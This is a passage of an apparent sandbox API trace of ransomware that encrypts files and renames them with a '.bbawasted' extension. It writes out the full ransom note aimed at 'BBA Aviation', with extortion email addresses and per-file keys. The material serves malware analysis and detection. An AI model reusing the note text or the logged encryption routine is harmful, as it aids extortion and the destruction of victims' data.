CryptReleaseContext (hProv=0x6aef58, dwFlags=0x0) returned 1 [0163.060] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\DHtmlHeader.html.bbawasted_info" (normalized: "c:\\588bce7c90097ed212\\dhtmlheader.html.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0163.061] WriteFile (in: hFile=0x280, lpBuffer=0x6a0928*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6a0928*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0163.062] SetEndOfFile (hFile=0x280) returned 1 [0163.062] SetFilePointer (in: hFile=0x280, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0163.062] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a0928 | out: hHeap=0x660000) returned 1 [0163.062] lstrcpyW (in: lpString1=0x69e36c, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0163.062] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\DHtmlHeader.html" (normalized: "c:\\588bce7c90097ed212\\dhtmlheader.html"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\DHtmlHeader.html.bbawasted" (normalized: "c:\\588bce7c90097ed212\\dhtmlheader.html.bbawasted")) returned 1 [0163.063] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\DHtmlHeader.html.bbawasted" (normalized: "c:\\588bce7c90097ed212\\dhtmlheader.html.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0163.063] CreateFileMappingW (hFile=0x290, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x28c [0163.063] GetFileSize (in: hFile=0x290, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x3ef6 [0163.064] MapViewOfFile (hFileMappingObject=0x28c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3ef6) returned 0x640000 [0163.064] CloseHandle (hObject=0x290) returned 1 [0163.068] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0163.071] CloseHandle (hObject=0x28c) returned 1 [0163.071] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0163.071] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6aef58) returned 1 [0163.072] CryptGenRandom (in: hProv=0x6aef58, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0163.072] CryptReleaseContext (hProv=0x6aef58, dwFlags=0x0) returned 1 [0163.072] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6aef58) returned 1 [0163.072] CryptGenRandom (in: hProv=0x6aef58, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0163.072] CryptReleaseContext (hProv=0x6aef58, dwFlags=0x0) returned 1 [0163.081] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0163.081] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0163.081] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a0928 [0163.081] _snwprintf (in: _Dest=0x6a0928, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]jm/GonHqBilzqfPpZytsvK9pWaUugH5npGzrLsSTK3gcjehU3F6cmMWAILe088VL\r\nX6Lk3cm+H+6HVEAHYYcvMeKhdj1gnEKEA+if8Q/phG04gQV6icVLTuPPTGT1EMOo\r\nFOl9mt2j2ew6hYbtlwCd7aqcmaqdUGWeWK+Wt43S8if7yGU60nIPmo8LeTjWbnmg\r\nIvti/RCGClAWHy9j/9TF1SafgLWLa0A/P+o2dD9rLhE051z6cqq6YXsILHObVHiD\r\nfRhU4TnAwIFMtpYnDvsBK16uMogBCdydai8CJJn4/R0T0moZju/mDQcEOBTE3vOD\r\nhIyHzs5al37WDnBWosoEuGz6nSiyYBZsAcMNc1Mh3bCozlmJHOn68F5MGzkJKgKT\r\n8Ri4gXJEdvnOjJwhiILtiz11oG4zq1fJXWA2bsVpAY+Q8Auoh4+jugbKTLekmeib\r\n0lU40AUqh7rH16cvMUpckaoALu69aCsF2CEIGznKqHQoh6w9aj3oNS4Sp+f23hAe\r\n+eXwPctSBpiv19AE17lys9hThyIRYYi4bT7g9y3b/vTVJnEi8vLPUI93Fwf/A3PX\r\nyTZf1qYt2GvcrSPh048SLbLRJsTmyQ1SZO85EQWGxtOdw3I8R4ACPq12RHSIkAYx\r\nQJ+osUbKyLFR5eEHX9kC1pCFV06A+1zGqQ2/JHWHFTq=[end_key]\r\nKEEP IT\r\n") returned 984 [0163.081] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0163.081] WriteFile (in: hFile=0x280, lpBuffer=0x6a0928*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6a0928*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0163.082] SetEndOfFile (hFile=0x280) returned 1 [0163.084] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a0928 | out: hHeap=0x660000) returned 1 [0163.084] CloseHandle (hObject=0x280) returned 1 [0163.096] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x69e318 | out: hHeap=0x660000) returned 1 [0163.097] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x66e370 | out: hHeap=0x660000) returned 1 [0163.097] _aulldvrm () returned 0x0 [0163.097] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x66c898) returned 1 [0163.170] CryptGenRandom (in: hProv=0x66c898, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0163.170] CryptReleaseContext (hProv=0x66c898, dwFlags=0x0) returned 1 [0163.170] lstrlenW (lpString="\\\\?\\C:\\588bce7c90097ed212\\DisplayIcon.ico") returned 41 [0163.170] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x25c) returned 0x6aecf0 [0163.171] lstrcpyW (in: lpString1=0x6aed42, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0163.171] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a0928 [0163.171] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6aef58) returned 1 [0163.171] CryptGenRandom (in: hProv=0x6aef58, dwLen=0xa3a, pbBuffer=0x6a0928 | out: pbBuffer=0x6a0928) returned 1 [0163.171] CryptReleaseContext (hProv=0x6aef58, dwFlags=0x0) returned 1 [0163.171] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\DisplayIcon.ico.bbawasted_info" (normalized: "c:\\588bce7c90097ed212\\displayicon.ico.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0163.172] WriteFile (in: hFile=0x280, lpBuffer=0x6a0928*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6a0928*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0163.173] SetEndOfFile (hFile=0x280) returned 1 [0163.174] SetFilePointer (in: hFile=0x280, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0163.174] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a0928 | out: hHeap=0x660000) returned 1 [0163.174] lstrcpyW (in: lpString1=0x6aed42, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0163.174] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\DisplayIcon.ico" (normalized: "c:\\588bce7c90097ed212\\displayicon.ico"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\DisplayIcon.ico.bbawasted" (normalized: "c:\\588bce7c90097ed212\\displayicon.ico.bbawasted")) returned 1 [0163.174] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\DisplayIcon.ico.bbawasted" (normalized: "c:\\588bce7c90097ed212\\displayicon.ico.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0163.175] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x27c [0163.175] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x159d5 [0163.175] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x159d5) returned 0x630000 [0163.175] CloseHandle (hObject=0x294) returned 1 [0163.188] UnmapViewOfFile (lpBaseAddress=0x630000) returned 1 [0163.188] CloseHandle (hObject=0x27c) returned 1 [0163.188] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x6ae598 [0163.188] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6aef58) returned 1 [0163.189] CryptGenRandom (in: hProv=0x6aef58, dwLen=0x1b8, pbBuffer=0x6ae5e0 | out: pbBuffer=0x6ae5e0) returned 1 [0163.189] CryptReleaseContext (hProv=0x6aef58, dwFlags=0x0) returned 1 [0163.189] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6aef58) returned 1 [0163.239] CryptGenRandom (in: hProv=0x6aef58, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0163.239] CryptReleaseContext (hProv=0x6aef58, dwFlags=0x0) returned 1 [0163.249] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0163.249] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ae598 | out: hHeap=0x660000) returned 1 [0163.249] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a0928 [0163.250] _snwprintf (in: _Dest=0x6a0928, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]OY6siJSHkeoMDC17CJ1/5Gbh8Gk4rJviebHo++60BlhZectKf/5qDqssxpz+2VvE\r\nI9Z7ebdB/R5Dtwh+ec1VcOOg03A7u6ZbfnF4pca19jSHW7obtaNa9XysRFtsTbE/\r\nKe5gGCBDZyhKr/ebGdOqDMyzOHmkQmpjnpro79EVhjwoV5h0LnLHdqwYOruM7GZk\r\n82bV0Epno6P+cpwudE1co0qNO95VkbBt9bZYQm6qyJXL7xoa0P3K9a+29ga2lhQn\r\n0kqAUUiQb3U0AP1MiLgeHvPNB/o3oTAQWpTchzAPE0ecDWQVlJalOM11xBtjCLnY\r\nCQylOLhdlUMBzWbj2lYkfIXotr2MNro7m1juzdKgceikcVRw61keDsUxG+1lZWVm\r\n7Kw+GsrOhhNKXtY0nHMmuta69TmECnRVT+DzDpcGSbS4ydSFpWCxNp2eWoyukDLf\r\nay6NDsW1Qw5+pwCvikm2adB5wI9DGPrXy8/n+qwhr9c9IwUIkMhbIH+cpFgWxe6X\r\nCf9WcmyVL+XURORz4w8+L/L3QdoFjQVzCqH5fn6gRkdbBC2NllSZQ/H9Uxhxx8Pq\r\nmMvuCoYn06xBFi5d8CF3ASgrEKCFRmjSCVkuYrAFnBUnR9a0zIL2iG8vViosXdjb\r\npphp04WQuQqcwTr5oP+tBWLfh8vKabmIp4nF40lAtoF=[end_key]\r\nKEEP IT\r\n") returned 984 [0163.250] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0163.250] WriteFile (in: hFile=0x280, lpBuffer=0x6a0928*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6a0928*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0163.250] SetEndOfFile (hFile=0x280) returned 1 [0163.253] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a0928 | out: hHeap=0x660000) returned 1 [0163.253] CloseHandle (hObject=0x280) returned 1 [0163.350] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0163.350] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x66e630 | out: hHeap=0x660000) returned 1 [0163.350] _aulldvrm () returned 0x0 [0163.350] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x66c898) returned 1 [0163.351] CryptGenRandom (in: hProv=0x66c898, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0163.351] CryptReleaseContext (hProv=0x66c898, dwFlags=0x0) returned 1 [0163.351] lstrlenW (lpString="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Print.ico") returned 44 [0163.351] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x262) returned 0x6a0548 [0163.351] lstrcpyW (in: lpString1=0x6a05a0, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0163.351] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a0928 [0163.351] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x66c898) returned 1 [0163.352] CryptGenRandom (in: hProv=0x66c898, dwLen=0xa3a, pbBuffer=0x6a0928 | out: pbBuffer=0x6a0928) returned 1 [0163.352] CryptReleaseContext (hProv=0x66c898, dwFlags=0x0) returned 1 [0163.352] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Print.ico.bbawasted_info" (normalized: "c:\\588bce7c90097ed212\\graphics\\print.ico.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0163.354] WriteFile (in: hFile=0x280, lpBuffer=0x6a0928*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6a0928*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0163.355] SetEndOfFile (hFile=0x280) returned 1 [0163.355] SetFilePointer (in: hFile=0x280, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0163.355] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a0928 | out: hHeap=0x660000) returned 1 [0163.355] lstrcpyW (in: lpString1=0x6a05a0, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0163.355] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Print.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\print.ico"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Print.ico.bbawasted" (normalized: "c:\\588bce7c90097ed212\\graphics\\print.ico.bbawasted")) returned 1 [0163.357] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Print.ico.bbawasted" (normalized: "c:\\588bce7c90097ed212\\graphics\\print.ico.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0163.357] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x27c [0163.357] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x47e [0163.357] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x47e) returned 0x640000 [0163.357] CloseHandle (hObject=0x294) returned 1 [0163.360] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0163.361] CloseHandle (hObject=0x27c) returned 1 [0163.361] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0163.361] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x66c898) returned 1 [0163.361] CryptGenRandom (in: hProv=0x66c898, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0163.361] CryptReleaseContext (hProv=0x66c898, dwFlags=0x0) returned 1 [0163.362] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x66c898) returned 1 [0163.362] CryptGenRandom (in: hProv=0x66c898, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0163.362] CryptReleaseContext (hProv=0x66c898, dwFlags=0x0) returned 1 [0163.373] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0163.373] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0163.373] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a0928 [0163.373] _snwprintf (in: _Dest=0x6a0928, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]gbavauG8ZyRU6hcFqvfd43vvFrKgRwjaD/ArQPlc7MTDBRK5MyFoMgYXIf5iu4AE\r\ngvTrMcGig58FN/43WLRifehvTSL4y1OEy/7SSGSZEiKtNZIAvoTDuNWeqPgGnp/E\r\nXzR3r855+hBNfKlUIAsYQZyBkWHAfOafoCWQFgTo1Ri4WDVTV2W8QTRCG221BWap\r\n9+3/vA4BApf7vLSiNXhp8yGYpnCRjhWoBTcaKdXsBrK9fv1b2s3glzx+YxnGSrqI\r\nVNn1VjbCGaxYsInkfeOUmIhWK6KSAMcvphu0t/GVLcWHKbkWjUdwnHnCfu4nYuVC\r\nXmaAXmCf/gwvFv0Q/diOBs7rLGl74rg9etYiPJqX8VTFBLi5pPSZGfZn8Bg2hO26\r\ncMhFu6AmqP0AfXStLbgzy6wKAP3/twMT3zHrNABfmZhh7GqANppyywFuqzmd0w5c\r\niytFUxVbTnU15iMeaBLxKIoYzzuzs5HW838LRfUw39ZpGlXqlqgzkECE+QBZE9QQ\r\nPH9PPYWNmiQhJlfcOJD/bD8YW2pqg7E0tkZ34tbPJobKGvsTXvlAd0MBq9Px/oD0\r\nUp5tDb92tssPr65vfWrIBxTz7t8LwEtLilp3cGhmRtXuAg57MnN4x29IM1iyxlHQ\r\nFgtcBk1vMlqN0OXk26xV8XzGPR4LPE+p7Mk3/wnGpKT=[end_key]\r\nKEEP IT\r\n") returned 984 [0163.373] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0163.373] WriteFile (in: hFile=0x280, lpBuffer=0x6a0928*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6a0928*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0163.373] SetEndOfFile (hFile=0x280) returned 1 [0163.376] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a0928 | out: hHeap=0x660000) returned 1 [0163.376] CloseHandle (hObject=0x280) returned 1 [0163.378] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a0548 | out: hHeap=0x660000) returned 1 [0163.378] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a3670 | out: hHeap=0x660000) returned 1 [0163.378] _aulldvrm () returned 0x0 [0163.378] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x66c898) returned 1 [0163.379] CryptGenRandom (in: hProv=0x66c898, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0163.379] CryptReleaseContext (hProv=0x66c898, dwFlags=0x0) returned 1 [0163.379] lstrlenW (lpString="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate1.ico") returned 46 [0163.379] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x266) returned 0x6a0548 [0163.379] lstrcpyW (in: lpString1=0x6a05a4, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0163.379] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a0928 [0163.379] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x66c898) returned 1 [0163.380] CryptGenRandom (in: hProv=0x66c898, dwLen=0xa3a, pbBuffer=0x6a0928 | out: pbBuffer=0x6a0928) returned 1 [0163.380] CryptReleaseContext (hProv=0x66c898, dwFlags=0x0) returned 1 [0163.380] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate1.ico.bbawasted_info" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate1.ico.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0163.455] WriteFile (in: hFile=0x294, lpBuffer=0x6a0928*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6a0928*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0163.456] SetEndOfFile (hFile=0x294) returned 1 [0163.456] SetFilePointer (in: hFile=0x294, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0163.456] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a0928 | out: hHeap=0x660000) returned 1 [0163.456] lstrcpyW (in: lpString1=0x6a05a4, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0163.457] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate1.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate1.ico"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate1.ico.bbawasted" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate1.ico.bbawasted")) returned 1 [0163.484] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate1.ico.bbawasted" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate1.ico.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x288 [0163.484] CreateFileMappingW (hFile=0x288, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x27c [0163.484] GetFileSize (in: hFile=0x288, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x37e [0163.484] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x37e) returned 0x640000 [0163.485] CloseHandle (hObject=0x288) returned 1 [0163.492] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0163.493] CloseHandle (hObject=0x27c) returned 1 [0163.493] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0163.493] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x66d1d0) returned 1 [0163.493] CryptGenRandom (in: hProv=0x66d1d0, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0163.493] CryptReleaseContext (hProv=0x66d1d0, dwFlags=0x0) returned 1 [0163.494] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x66d1d0) returned 1 [0163.494] CryptGenRandom (in: hProv=0x66d1d0, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0163.494] CryptReleaseContext (hProv=0x66d1d0, dwFlags=0x0) returned 1 [0163.505] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0163.506] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: 